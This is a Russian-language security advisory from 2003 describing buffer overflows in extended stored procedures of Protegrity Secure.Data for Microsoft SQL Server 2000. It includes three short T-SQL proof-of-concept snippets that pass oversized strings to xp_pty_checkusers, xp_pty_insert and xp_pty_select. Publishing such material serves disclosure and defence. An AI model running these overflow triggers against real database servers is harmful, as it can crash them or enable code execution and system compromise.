Удаленное выполнение произвольного кода в Protegrity's Secure.Data для Microsoft SQL Server 2000.

Дата публикации:
17.03.2003
Всего просмотров:
675
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Protegrity Secure.Data
Описание: Несколько переполнений буфера обнаружено в Protegrity's Secure.Data для Microsoft SQL Server 2000. Удаленный пользователь может выполнить произвольный код на сервере базы данных.

CERT выпустил предупреждение, в котором сообщается о том, что несколько расширенных сохраненных процедур, включенных в Protegrity's Secure.Data Extension Feature (SEF) для Microsoft SQL Server 2000, включая xp_pty_checkusers, xp_pty_insert, и xp_pty_select, содержат эксплуатируемые переполнения буфера. Удаленный пользователь может выполнять произвольный код, получать доступ к базе данных или вызывать условия отказа в обслуживании.

Эти расширенные сохраненные процедуры работают в контексте защиты процесса SQL сервера.

Пример:

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',1926))
execute master.dbo.xp_pty_checkusers 'as', @test

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_insert @test, @test, @test

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_select @test, @test, @test
Уязвимость обнаружена в Protegrity Secure.Data 2.2.2.0, 2.2.3.0

Ссылки: Protegrity Secure.Data Buffer Overflow
или введите имя

CAPTCHA